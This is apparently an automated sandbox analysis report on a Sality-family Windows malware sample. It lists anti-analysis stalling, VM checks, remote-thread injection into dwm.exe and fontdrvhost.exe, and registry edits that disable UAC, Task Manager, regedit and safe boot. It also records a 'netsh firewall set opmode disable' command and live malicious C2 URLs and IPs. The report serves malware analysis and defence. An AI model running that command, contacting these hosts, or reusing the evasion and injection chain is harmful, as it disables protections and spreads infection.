        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-25472
        Found stalling execution ending in API Sleep call
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeStalling execution: Execution stalls by calling Sleepgraph_0-25475
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0040A0D0 SetupDiSetSelectedDevice,_memset,SetupDiGetDeviceRegistryPropertyA,SetupDiCallClassInstaller,SetupDiRemoveDevice,0_2_0040A0D0
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ipyr.exeJump to dropped file
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-25450
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-25482
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-25829
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe TID: 1568Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe TID: 1736Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe TID: 3428Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe TID: 3832Thread sleep time: -1500000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe TID: 3832Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_004099CB DialogBoxParamA,_memset,_memset,_memset,GetSystemDirectoryA,_swprintf,FindFirstFileA,FindFirstFileA,_strcpy_s,SHGetFolderPathA,_swprintf,FindFirstFileA,_strcpy_s,0_2_004099CB
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00401A50 FindFirstFileA,SetLastError,GetLastError,GetLastError,FindNextFileA,GetLastError,FindClose,0_2_00401A50
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00409700 GetWindowsDirectoryA,_sprintf,_sprintf,FindFirstFileA,_printf,_sprintf,FindClose,FindNextFileA,FindNextFileA,_sprintf,FindNextFileA,FindClose,FindClose,0_2_00409700
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022FFA87 Sleep,FindFirstFileA,FindNextFileA,FindClose,Sleep,0_2_022FFA87
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022FB81A FindFirstFileA,FindNextFileA,Sleep,0_2_022FB81A
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeThread delayed: delay time: 300000Jump to behavior
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.000000000051E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: netsh.exe, 00000001.00000002.1499427740.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
        Source: dwm.exe, 00000006.00000000.1460526610.0000026DACB82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: dwm.exe, 00000006.00000000.1460526610.0000026DACB82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeAPI call chain: ExitProcess graph end nodegraph_0-25474
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeAPI call chain: ExitProcess graph end nodegraph_0-24923
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeAPI call chain: ExitProcess graph end nodegraph_0-25452
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeAPI call chain: ExitProcess graph end nodegraph_0-25488
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0040C042 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040C042
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0047C11B LoadLibraryA,SetErrorMode,CreateFileMappingA,CreateFileMappingA,MapViewOfFile,CreateThread,Sleep,GetModuleFileNameA,LoadLibraryA,GetProcAddress,CreateMutexA,GetLastError,Sleep,ExitProcess,0_2_0047C11B
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0040E0E8 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,0_2_0040E0E8
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0040C042 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040C042
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0041A62E _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041A62E
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00416A8C SetUnhandledExceptionFilter,0_2_00416A8C
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0040F338 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F338

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMemory allocated: C:\Windows\System32\dwm.exe base: 460000 protect: page execute and read and writeJump to behavior
        Contains functionality to inject threads in other processes
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_02300D40 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,0_2_02300D40
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D00000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMemory written: C:\Windows\System32\dwm.exe base: 460000Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_004053F0 GetVersionExA,ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,RevertToSelf,0_2_004053F0
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_004053F0 GetVersionExA,ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,RevertToSelf,0_2_004053F0
        Source: dwm.exe, 00000006.00000002.2701382773.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000006.00000000.1455385331.0000026DAA594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: dwm.exe, 00000006.00000000.1455875974.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000006.00000002.2702252838.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: dwm.exe, 00000006.00000000.1455875974.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000006.00000002.2702252838.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: dwm.exe, 00000006.00000000.1455875974.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000006.00000002.2702252838.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
        Source: dwm.exe, 00000006.00000000.1455875974.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000006.00000002.2702252838.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00417908 cpuid 0_2_00417908
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: GetLocaleInfoA,0_2_00417538
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0040A0D0 SetupDiSetSelectedDevice,_memset,SetupDiGetDeviceRegistryPropertyA,SetupDiCallClassInstaller,SetupDiRemoveDevice,0_2_0040A0D0
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00415046 GetSystemTimeAsFileTime,__aulldiv,0_2_00415046
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00403260 GetModuleHandleA,GetProcAddress,GetCurrentProcess,_sprintf,MessageBoxA,GetWindowsDirectoryA,GetSystemDirectoryA,GetCurrentDirectoryA,_memset,SHGetFolderPathA,SHGetFolderPathA,PathAppendA,SHGetFolderPathA,SHGetSpecialFolderPathA,SHGetSpecialFolderPathA,SHGetSpecialFolderPathA,_getenv,_getenv,SHGetSpecialFolderPathA,GetUserDefaultLangID,SHGetSpecialFolderPathA,_sprintf,SHGetSpecialFolderPathA,_sprintf,GetModuleFileNameA,GetComputerNameA,GetUserNameA,GetVersionExA,_sprintf,_sprintf,0_2_00403260
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00403260 GetModuleHandleA,GetProcAddress,GetCurrentProcess,_sprintf,MessageBoxA,GetWindowsDirectoryA,GetSystemDirectoryA,GetCurrentDirectoryA,_memset,SHGetFolderPathA,SHGetFolderPathA,PathAppendA,SHGetFolderPathA,SHGetSpecialFolderPathA,SHGetSpecialFolderPathA,SHGetSpecialFolderPathA,_getenv,_getenv,SHGetSpecialFolderPathA,GetUserDefaultLangID,SHGetSpecialFolderPathA,_sprintf,SHGetSpecialFolderPathA,_sprintf,GetModuleFileNameA,GetComputerNameA,GetUserNameA,GetVersionExA,_sprintf,_sprintf,0_2_00403260

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Changes security center settings (notifications, updates, antivirus, firewall)
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverrideJump to behavior
        Deletes keys which are related to windows safe boot (disables safe mode boot)
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShellJump to behavior
        Disable Task Manager(disabletaskmgr)
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeRegistry value created: DisableTaskMgr 1Jump to behavior
        Disables UAC (registry)
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
        Disables the Windows registry editor (regedit)
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system DisableRegistryToolsJump to behavior
        Disables the Windows task manager (taskmgr)
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system DisableTaskMgrJump to behavior
        Disables the windows firewall (over ALG)
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall set opmode disable
        Disables user account control notifications
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security CenterJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Modifies the windows firewall
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall set opmode disable
        Uses netsh to modify the Windows network and firewall settings
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall set opmode disable
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022F3846 socket,setsockopt,bind,recvfrom,0_2_022F3846

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure1
        Replication Through Removable Media        		13
        Native API        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		10
        Disable or Modify Tools        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		4
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts3
        Command and Scripting Interpreter        		1
        Windows Service        		1
        Bypass User Account Control        		1
        Deobfuscate/Decode Files or Information        		LSASS Memory1
        Peripheral Device Discovery        		Remote Desktop Protocol1
        Credential API Hooking        		12
        Encrypted Channel        		Exfiltration Over Bluetooth1
        Inhibit System Recovery
        Email AddressesDNS ServerDomain Accounts1
        Service Execution        		Logon Script (Windows)1
        Access Token Manipulation        		3
        Obfuscated Files or Information        		Security Account Manager1
        Account Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Windows Service        		2
        Software Packing        		NTDS3
        File and Directory Discovery        		Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script32
        Process Injection        		1
        DLL Side-Loading        		LSA Secrets43
        System Information Discovery        		SSHKeylogging4
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Bypass User Account Control        		Cached Domain Credentials1
        Query Registry        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
        Virtualization/Sandbox Evasion        		DCSync21
        Security Software Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation        		Proc Filesystem21
        Virtualization/Sandbox Evasion        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt32
        Process Injection        		/etc/passwd and /etc/shadow3
        Process Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        System Owner/User Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        LisectAVT_2403002B_38.exe100%AviraW32/Sality.Y
        LisectAVT_2403002B_38.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://kukutrustnet987.info/home.gif100%Avira URL Cloudmalware
        https://www.otzywy.com/?76caf3=77852030%Avira URL Cloudsafe
        http://steamboy.h17.ru/mainf.gif?76caf3=7785203L100%Avira URL Cloudmalware
        https://www.otzywy.com/d0%Avira URL Cloudsafe
        https://www.otzywy.com/?76caf3=7785203k0%Avira URL Cloudsafe
        http://steamboy.h17.ru/mainf.gif100%Avira URL Cloudmalware
        http://www.ukikt.org/mainf.gif100%Avira URL Cloudmalware
        http://www.klkjwre9fqwieluoi.info/100%Avira URL Cloudmalware
        http://klkjwre77638dfqwieuoi888.info/100%Avira URL Cloudmalware
        http://kukutrustnet888.info/home.gif100%Avira URL Cloudmalware
        http://macedonia.my1.ru/mainh.gif?7231d3=37419295s100%Avira URL Cloudmalware
        http://lpbmx.ru/logos.gif?722bd8=7482328100%Avira URL Cloudmalware
        http://macedonia.my1.ru/mainh.gif?7231d3=374192954100%Avira URL Cloudmalware
        http://macedonia.my1.ru/mainh.gif100%Avira URL Cloudmalware
        http://kukutrustnet777888.info/DisableTaskMgrSoftware100%Avira URL Cloudphishing
        http://kukutrustnet777.info/home.gif100%Avira URL Cloudmalware
        http://ramoo.w8w.pl/mainh.gif100%Avira URL Cloudmalware
        http://www.klkjwre9fqwieluoi.info/abp470n5.sysGetSystemDirectoryAdrivers100%Avira URL Cloudmalware
        http://lpbmx.ru/logos.gif100%Avira URL Cloudmalware
        http://steamboy.h17.ru/mainf.gif?76caf3=7785203100%Avira URL Cloudmalware
        http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif100%Avira URL Cloudmalware
        http://jrsx.jre.net.cn/logos.gif100%Avira URL Cloudmalware
        http://jrsx.jre.net.cn/logos.gif?723619=74849530CE100%Avira URL Cloudmalware
        http://lpbmx.ru/logos.gif?722bd8=74823287h)100%Avira URL Cloudmalware
        http://steamboy.h17.ru/mainf.gif?76caf3=7785203j100%Avira URL Cloudmalware
        http://kukutrustnet777888.info/100%Avira URL Cloudphishing
        https://www.otzywy.com/?76caf3=7785203E0%Avira URL Cloudsafe
        https://www.otzywy.com/0%Avira URL Cloudsafe
        http://lpbmx.ru/logos.gifhttp://macedonia.my1.ru/mainh.gifhttp://jrsx.jre.net.cn/logos.gifhttp://ste100%Avira URL Cloudmalware
        http://89.119.67.154/testo5/100%Avira URL Cloudmalware
        https://www.otzywy.com/onia.my1.ru/mainh.gif?7231d3=374192950%Avira URL Cloudsafe
        https://www.otzywy.com/?76caf3=7785203om/?76caf3=77852030%Avira URL Cloudsafe
        http://macedonia.my1.ru/mainh.gif?7231d3=37419295100%Avira URL Cloudmalware
        http://steamboy.h17.ru/U100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        macedonia.my1.ru
        		193.109.247.16
        		truefalse
          		unknown
          otzywy.com
          		195.201.126.132
          		truefalse
            		unknown
            steamboy.h17.ru
            		107.172.18.180
            		truefalse
              		unknown
              lpbmx.ru
              		unknown
              		unknownfalse
                		unknown
                jrsx.jre.net.cn
                		unknown
                		unknownfalse
                  		unknown
                  www.otzywy.com
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://steamboy.h17.ru/mainf.gif?76caf3=7785203false
                    • Avira URL Cloud: malware
                    		unknown
                    http://macedonia.my1.ru/mainh.gif?7231d3=37419295false
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://klkjwre77638dfqwieuoi888.info/LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://kukutrustnet987.info/home.gifLisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.otzywy.com/?76caf3=7785203LisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://steamboy.h17.ru/mainf.gifLisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.otzywy.com/dLisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://kukutrustnet888.info/home.gifLisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.klkjwre9fqwieluoi.info/LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.ukikt.org/mainf.gifLisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.otzywy.com/?76caf3=7785203kLisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://steamboy.h17.ru/mainf.gif?76caf3=7785203LLisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://macedonia.my1.ru/mainh.gif?7231d3=37419295sLisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://macedonia.my1.ru/mainh.gif?7231d3=374192954LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://kukutrustnet777.info/home.gifLisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://kukutrustnet777888.info/DisableTaskMgrSoftwareLisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://macedonia.my1.ru/mainh.gifLisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
